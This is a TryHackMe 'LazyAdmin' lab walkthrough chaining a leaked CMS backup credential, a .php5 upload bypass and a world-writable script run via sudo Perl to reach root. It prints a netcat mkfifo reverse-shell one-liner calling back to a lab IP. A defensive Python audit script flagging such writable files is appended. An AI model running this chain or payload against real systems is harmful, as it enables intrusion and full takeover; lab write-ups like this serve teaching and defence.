TryHackMe - LazyAdmin (Easy)

Summary

Gobuster finds a hidden directory /content that leaks the CMS name. Searchsploit finds an exploit that leads us to a MySQL backup file, which leaks the admin user's password hash. The hash is plain MD5 and we recover the plaintext password easily. Running Gobuster on /content, we find another hidden directory /content/as that has a login form. Using the leaked credential, we can access the admin panel.

In the admin panel, we find a file upload vulnerability and an easy file extension bypass. Upload php-reverse-shell.php5 and get a reverse shell as www-data.

In the privilege escalation phase, sudo -l finds that we are able to execute Perl as root. There is a backup script that executes /etc/copy.sh as root and /etc/copy.sh is world-writable. Store a Netcat reverse shell payload in it and run sudo perl on the backup script. Then we catch a reverse shell as root.

IP

  • RHOST: 10.10.10.20

  • LHOST: 10.13.12.2

Nmap

Asset Discovery

Gobuster finds a hidden directory /content:

Visit http://lazyadmin.thm/content/. The CMS used is SweetRice:

Admin Panel: Leaked Credential from MySQL Backup

Searchsploit:

The "Backup Disclosure" PoC says that MySQL backup is at /inc/mysql_backup. In our case, it is at /content/inc/mysql_backup. Try to access this directory:

The manager user's password hash is leaked in this backup:

MD5 reverse hash lookup shows that the plaintext password is Password123, so the credential is manager:Password123. Now we need to find a login page to utilize this credential.

Run Gobuster on the directory /content and we find a new directory /content/as:

This directory has a login form:

Try the credential we just found and now we have access to the admin panel:

www-data Shell: File Upload

There is an arbitrary file upload exploit for SweetRice:

It suggests .php5 bypasses the filter:

Rename php-reverse-shell.php to php-reverse-shell.php5, go to "Media Center", and upload it:

Start a pwncat listener and catch a reverse shell as www-data:

Privilege Escalation: Sudo Perl => World-Writable File => Reverse Shell

sudo -l:

The file /home/itguy/backup.pl executes sh /etc/copy.sh as root and /etc/copy.sh is world-writable:

Store a Netcat reverse shell payload in /etc/copy.sh:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.12.2 1337 >/tmp/f' > /etc/copy.sh

Start a pwncat listener and execute backup.pl as root:

sudo /usr/bin/perl /home/itguy/backup.pl

Now we have a root shell:
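A defender-side check for the misconfiguration used above (an added example, not part of the original writeup): it reads a script that sudo allows, extracts the files it hands to a shell, and flags any that non-root users can modify. The temp-dir layout built in demo() is constructed to mirror backup.pl and copy.sh, and the regex is an assumption about how the wrapper invokes the shell.

```python
"""Audit helper: find files that a sudo-permitted script passes to a shell
and that are writable by users other than root. Constructed example."""
import os
import re
import stat
import tempfile

# Assumed invocation shapes: sh /path, /bin/bash /path, /usr/bin/dash /path
INVOKE_RE = re.compile(
    r"""(?<![\w/])(?:/(?:usr/)?bin/)?(?:sh|bash|dash)\s+(/[^\s"'`;)]+)"""
)

def invoked_scripts(script_path):
    """Return absolute paths that the script passes to a shell interpreter."""
    with open(script_path, encoding="utf-8", errors="replace") as f:
        return sorted(set(INVOKE_RE.findall(f.read())))

def writable_by_others(path):
    """True if group or world can write the file (the weakness in this room)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(script_path):
    """List (path, octal mode) of invoked scripts that non-root users can edit."""
    findings = []
    for target in invoked_scripts(script_path):
        if os.path.exists(target) and writable_by_others(target):
            findings.append((target, oct(stat.S_IMODE(os.stat(target).st_mode))))
    return findings

def demo():
    """Rebuild the room's layout in a temp dir: backup.pl calling a 0777 copy.sh.
    Returns the findings before and after tightening the mode to 0755."""
    tmp = tempfile.mkdtemp()
    copy_sh = os.path.join(tmp, "copy.sh")
    backup_pl = os.path.join(tmp, "backup.pl")
    with open(copy_sh, "w") as f:
        f.write("#!/bin/sh\necho backup\n")
    os.chmod(copy_sh, 0o777)          # world-writable, as on the box
    with open(backup_pl, "w") as f:
        f.write('system("sh %s");\n' % copy_sh)   # constructed backup.pl body
    before = audit(backup_pl)
    os.chmod(copy_sh, 0o755)          # the fix: only the owner (root) can edit it
    return before, audit(backup_pl)

if __name__ == "__main__":
    before, after = demo()
    print("before fix:", before)   # one finding with mode 0o777
    print("after fix:", after)     # []
```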
